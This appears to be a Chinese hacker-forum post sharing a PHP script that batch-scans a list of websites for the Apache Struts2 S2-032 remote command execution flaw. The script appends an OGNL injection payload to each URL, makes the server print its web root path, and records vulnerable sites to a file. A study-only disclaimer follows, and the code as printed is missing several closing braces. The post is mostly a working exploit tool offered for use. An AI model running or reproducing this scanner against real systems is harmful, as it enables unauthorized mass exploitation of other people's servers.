Struts2 PHP批量检测脚本 - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

Struts2 PHP批量检测脚本

无法 技术文章
<?php 

/* 
Strutr2 批量扫描工具 
By:无法
*/ 
error_reporting(0); 
if(empty($argv[1])){ 
  print_r(" 
+==================================+ 
|   S2-032命令执行批量扫描工具       | 
|     http://www.hongkediguo.com  | 
|       红客帝国                   | 
|        By:无法                  | 
+==================================+ 

[+]程序还存在一些Bug 比如一些奇葩网站的回显误报相对较低 
[+]扫完同目录生成文件名_ok.txt文本存放存在漏洞的网站 
->php $argv[0] url.txt 
    ");exit; 


$txt = explode("\n",file_get_contents($argv[1]));  //要扫描的脚本 

echo "[+]$argv[1] 共 ".count($txt)." 条\r\n"; 

//获取盘符路径POC 
$poc = "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8"; 

for($i = 0;$i<count($txt);$i++){ 
  if(!empty($txt[$i])){ 
    $u = trim($txt[$i]).$poc; 
    $data_str = c($u); 
    if(stripos($data_str,"</") || empty($data_str)){ 
      echo trim($txt[$i])."  No \n"; 
    }else{ 
      echo trim($txt[$i])."  Yes  Path:".trim($data_str)." \n"; 
      $fp = fopen($argv[1]."_OK.txt",'a+'); 
      fwrite($fp,trim($txt[$i])."\r\n"); 
      fclose($fp); 
    } 
  } 

echo "\r\n[+]扫描完毕 请到".$argv[1]."_OK.txt查看结果"; 

function c($url){ 
  $c = curl_init(); 
  curl_setopt($c,CURLOPT_URL,$url); 
  curl_setopt($c,CURLOPT_BINARYTRANSFER,true); 
  curl_setopt($c, CURLOPT_HEADER, 0); 
  curl_setopt($c, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)'); 
  curl_setopt($c, CURLOPT_TIMEOUT, 15); 
  curl_setopt($c, CURLOPT_REFERER, $url); 
  curl_setopt($c,CURLOPT_RETURNTRANSFER,1); 
  $data = curl_exec($c); 
  return $data; 
  curl_close($c); 


?>
------------------------------------------------------------------
 中国红客帝国 479560186         中国红客帝国 342072873       红客帝国 234116828

标签: 暂无标签

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表